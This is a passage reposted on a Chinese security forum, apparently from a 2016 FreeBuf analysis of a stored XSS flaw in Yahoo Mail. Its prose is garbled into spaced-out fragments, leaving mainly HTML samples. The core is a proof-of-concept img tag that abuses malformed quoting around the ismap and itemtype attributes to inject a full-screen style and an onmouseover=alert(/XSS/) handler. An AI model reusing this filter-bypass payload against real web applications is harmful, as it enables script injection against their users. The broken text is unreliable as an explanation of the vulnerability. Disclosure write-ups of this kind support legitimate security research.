[9791] 2016-01-29_雅虎邮箱XSS漏洞细节分析

文档创建者:s7ckTeam
浏览次数:38
最后更新:2025-01-18
2016-01-29_雅虎邮箱XSS漏洞细节分析 X S S d a w n e r   F r e e B u f   2 0 1 6 - 0 1 - 2 9 X S S X S S W E B X S S P O C W E B a p p 2 0 1 4 2 3 亿 H T M L f u z z b o o l H T M L r e m o v e < I N P U T   T Y P E = " c h e c k b o x "   C H E C K E D = " h e l l o "   N A M E = " c h e c k   b o x " > < I N P U T   T Y P E = " c h e c k b o x "   C H E C K E D =   N A M E = " c h e c k   b o x " > W E B c h e c k e d c h e c k H T M L b o o l H T M L P O C 使 使 < i m g   i s m a p = ' x x x '   i t e m t y p e = ' y y y   s t y l e = w i d t h : 1 0 0 % ; h e i g h t :   a u t o   ! i m p o r t a n t ; p o s i t i o n : f i x e d ; l e f t : 0 p x ; t o p : 0 p x ;   o n m o u s e o v e r = a l e r t ( / X S S / ) / / ' > < i m g   i s m a p = i t e m t y p e = y y y   s t y l e = w i d t h : 1 0 0 % ; h e i g h t :   a u t o   ! i m p o r t a n t ; p o s i t i o n : f i x e d ; l e f t : 0 p x ; t o p : 0 p x ;   o n m o u s e o v e r = a l e r t ( / X S S / ) / / > P O C i m g J a v a s c r i p t o n m o u s e o v e r
2 0 1 5 1 2 2 6 H a c k e r O n e 2 0 1 6 1 6 1
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则